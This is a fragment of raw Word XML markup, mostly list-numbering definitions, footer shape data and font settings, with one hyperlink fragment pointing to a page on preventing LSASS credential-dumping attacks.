      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>preventing-lsass-credential-dumping-attacks/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId3" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgNumType w:fmt="numberInDash"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panose1 w:val="02000603000000000000"/>
    <w:charset w:val="81"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="F3FBAEFF" w:usb1="F1F7FFFF" w:usb2="0000147E" w:usb3="00000000" w:csb0="802800FF" w:csb1="FDFD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2624455</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-47625</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8</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6.65pt;margin-top:-3.75pt;height:144pt;width:144pt;mso-position-horizontal-relative:margin;mso-wrap-style:none;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="f" coordsize="21600,21600" o:gfxdata="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Eg&#10;6FHYAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO&#10;4kDoYfePIwIAAGIEAAAOAAAAAAAAAAEAIAAAACcBAABkcnMvZTJvRG9jLnhtbFBLBQYAAAAABgAG&#10;AFkBAAC8BQAAAAA=&#10;">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke on="f" weight="0.5pt"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
              <v:textbox inset="0mm,0mm,0mm,0mm" style="mso-fit-shape-to-text:t;">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8</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>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74295"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="81774295"/>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1">
    <w:nsid w:val="83BC0A80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83BC0A8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844DFF95"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="844DFF95"/>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84E9D8BB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="84E9D8BB"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="893BE334"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="893BE334"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="817"/>
        </w:tabs>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="15"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="8BF08D37"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8BF08D37"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
        </w:tabs>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
        <w:bCs/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="8E850083"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8E850083"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="9175135A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9175135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8">
    <w:nsid w:val="93170FCA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="93170FCA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="96D2ED59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96D2ED59"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
        </w:tabs>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397"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9CEF6474"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9CEF64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9E706CE5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9E706C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A18DB3BC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A18DB3BC"/>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A4540A84"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A4540A84"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="817"/>
        </w:tabs>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="15"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14">
    <w:nsid w:val="AA9B06B2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AA9B06B2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15">
    <w:nsid w:val="AEE2D29C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AEE2D2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21BC1D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B21BC1D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B982AED0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B982AED0"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18">
    <w:nsid w:val="CAAB234F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CAAB234F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19">
    <w:nsid w:val="CD3D7667"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CD3D76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CF8F0C53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CF8F0C53"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="817"/>
        </w:tabs>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="15"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21">
    <w:nsid w:val="CF9B8B0F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CF9B8B0F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
        </w:tabs>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="13"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22">
    <w:nsid w:val="D2938F5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2938F5B"/>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E25BC0E0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E25BC0E0"/>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E495AC92"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E495AC92"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="18"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25">
    <w:nsid w:val="EDA9FBD5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EDA9FBD5"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
        </w:tabs>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="18"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26">
    <w:nsid w:val="F7072511"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7072511"/>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27">
    <w:nsid w:val="F746D316"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F746D316"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
        </w:tabs>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397"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F7B31A56"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7B31A56"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29">
    <w:nsid w:val="F9C03537"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F9C03537"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30">
    <w:nsid w:val="012BB342"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="012BB342"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="817"/>
        </w:tabs>
        <w:ind w:left="817" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31">
    <w:nsid w:val="0257B99B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0257B99B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="32">
    <w:nsid w:val="03DF2473"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03DF2473"/>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33">
    <w:nsid w:val="0980549C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0980549C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34">
    <w:nsid w:val="0A2588C9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0A2588C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5">
    <w:nsid w:val="0EDF10C5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0EDF10C5"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="36">
    <w:nsid w:val="166A5482"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="166A5482"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37">
    <w:nsid w:val="19720548"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="19720548"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="38">
    <w:nsid w:val="1F00A8B9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1F00A8B9"/>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39">
    <w:nsid w:val="1F241866"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1F2418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25A1F957"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="25A1F957"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41">
    <w:nsid w:val="2798DF36"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2798DF36"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="789"/>
        </w:tabs>
        <w:ind w:left="789" w:leftChars="0" w:hanging="369" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="15"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="42">
    <w:nsid w:val="29E9345A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="29E9345A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="43">
    <w:nsid w:val="2C4B237C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2C4B237C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="44">
    <w:nsid w:val="2E418F6E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2E418F6E"/>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45">
    <w:nsid w:val="2F08E786"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2F08E786"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="46">
    <w:nsid w:val="3A32A71C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3A32A71C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="47">
    <w:nsid w:val="40BDEA8E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="40BDEA8E"/>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48">
    <w:nsid w:val="458DF488"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="458DF488"/>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49">
    <w:nsid w:val="470104C3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="470104C3"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="50">
    <w:nsid w:val="479DBB25"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="479DBB25"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="51">
    <w:nsid w:val="53AA297C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="53AA297C"/>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52">
    <w:nsid w:val="53B05221"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="53B05221"/>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53">
    <w:nsid w:val="544863EB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="544863EB"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="397"/>
        </w:tabs>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="15"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="54">
    <w:nsid w:val="54E2BCFB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="54E2BC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59168617"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59168617"/>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56">
    <w:nsid w:val="5A8802F2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A8802F2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="15"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="57">
    <w:nsid w:val="60EA6283"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="60EA6283"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="58">
    <w:nsid w:val="6229E9DC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6229E9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6A6FCCF2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6A6FCCF2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="60">
    <w:nsid w:val="6B036F1A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6B036F1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61">
    <w:nsid w:val="6E8F59A0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6E8F59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6FE4A477"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6FE4A477"/>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63">
    <w:nsid w:val="7659C051"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7659C051"/>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64">
    <w:nsid w:val="79FC2BA3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="79FC2BA3"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="1"/>
  </w:num>
